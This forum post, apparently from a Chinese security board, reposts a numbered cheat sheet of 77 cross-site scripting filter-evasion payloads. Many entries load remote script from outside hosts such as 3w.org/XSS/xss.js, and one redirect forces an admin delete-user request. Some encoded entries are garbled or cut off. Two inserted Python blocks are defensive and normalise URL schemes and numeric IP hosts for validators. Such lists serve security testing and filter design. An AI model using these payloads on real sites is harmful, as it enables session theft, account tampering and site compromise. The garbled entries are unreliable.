It seems there isn't much XSS material on t00ls, so I've copied over something good I came across, in case anyone wants to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around a character limit (requires all pieces on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically don't work domestically, since there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the IMG JavaScript
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
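Most of entries 4 through 19 and entry 47 defeat a filter that looks for the literal string javascript: before the browser has decoded and cleaned the value. As an added defensive example (mine, not part of this post or of the cheat sheet it copies), the Python below canonicalises a URL-valued attribute the way such a lenient parser would and only then tests the scheme, so one check covers all of those variants at once; the encoded sample inputs are constructed by hand, since the copy above lost them, and the U+2000-U+200F range is my assumption for the garbled "8192-8&13".

```python
import html

# Code points a lenient (IE-era) URL parser skips before and inside the
# scheme: entry 47 lists 1-32, 34, 39, 160, 8192-8&13, 12288, 65279. NUL is
# added for entries 17/18; U+2000-U+200F is my assumption for "8192-8&13".
IGNORED_CODEPOINTS = frozenset(
    {0, 34, 39, 160, 12288, 65279} | set(range(1, 33)) | set(range(8192, 8208))
)
SCRIPT_SCHEMES = ("javascript:", "vbscript:")


def normalize_url_attr(value: str) -> str:
    """Canonicalise a SRC/HREF/url() value the way a lenient browser reads it:
    decode character references with or without the trailing ';' (entries 5,
    9, 10; html.unescape applies the HTML5 rules, which allow both), drop the
    ignored code points (tab, LF, CR, NUL, leading space: entries 11-14,
    17-19, 47), then lower-case, since schemes are case-insensitive (entry 4).
    """
    decoded = html.unescape(value)
    kept = "".join(ch for ch in decoded if ord(ch) not in IGNORED_CODEPOINTS)
    return kept.lower()


def is_script_url(value: str) -> bool:
    """True if the value could dispatch to a script scheme after normalising.
    Deliberately over-approximate: a validator should reject anything that
    might be read as javascript:, not only the spellings a blocklist knows.
    """
    return normalize_url_attr(value).startswith(SCRIPT_SCHEMES)


# Constructed inputs modelled on the IMG SRC entries above; the encoded forms
# were lost when the list was copied, so they are rebuilt here by hand.
SAMPLES = {
    "entry 4, mixed case": "JaVaScRiPt:alert('XSS')",
    "entry 5, decimal entities":
        "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "entry 10, hex without semicolons":
        "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61lert('XSS')",
    "entry 12, encoded tab": "jav&#x09;ascript:alert('XSS');",
    "entry 17, NUL byte": "java\0script:alert('XSS')",
    "entry 19, leading space": " javascript:alert('XSS');",
    "benign remote script": "http://3w.org/XSS/xss.js",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print("REJECT" if is_script_url(value) else "allow ", label)
```

A validator built this way rejects the whole family of spellings; the safer production rule is to allow-list http: and https: rather than to deny-list script schemes.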
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) With ActionScript in Flash you can smuggle your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
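Entries 70 through 73 are the same address written in decimal, hex, octal and mixed bases, which is why a host allow-list that compares strings misses them. As an added example (mine, not the post's), this Python canonicalises such numeric hosts with inet_aton rules before the comparison, so 3232235521, 0xc0.0xa8.0x00.0x01 and 0300.0250.0000.0001 all compare as 192.168.0.1; it also normalises names, including the trailing-dot form of entry 76.

```python
def parse_legacy_ipv4(host: str):
    """Canonicalise a numeric host the way inet_aton-style URL parsers do.

    Returns the dotted-decimal address, or None when the host is not a numeric
    address (a real name, an empty part, more than four parts, an out-of-range
    value). Covers the forms of entries 70-73: one 32-bit decimal (3232235521),
    hex octets (0xc0.0xa8.0x00.0x01), octal octets (0300.0250.0000.0001) and
    mixed bases, where the last part fills all the remaining bytes.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if part[:2].lower() == "0x":            # hex octet
            base, digits = 16, part[2:]
        elif len(part) > 1 and part[0] == "0":  # leading zero: octal octet
            base, digits = 8, part[1:]
        else:                                   # plain decimal
            base, digits = 10, part
        # int() also accepts signs, spaces and underscores; refuse those.
        if not (digits.isascii() and digits.isalnum()):
            return None
        try:
            values.append(int(digits, base))
        except ValueError:
            return None
    *prefix, last = values
    if any(v > 255 for v in prefix):
        return None
    width = 4 - len(prefix)                     # bytes the last part fills
    if last >= 256 ** width:
        return None
    number = 0
    for v in prefix:
        number = (number << 8) | v
    number = (number << (8 * width)) | last
    return ".".join(str((number >> shift) & 255) for shift in (24, 16, 8, 0))


def canonical_host(host: str) -> str:
    """Host form to compare against an allow-list: numeric hosts become dotted
    decimal, names are lower-cased and lose the trailing dot of entry 76."""
    numeric = parse_legacy_ipv4(host)
    return numeric if numeric is not None else host.lower().rstrip(".")
```

Tabs and newlines inside the host, as in entry 73, must be stripped by the URL parser before this step, as browsers do.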
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>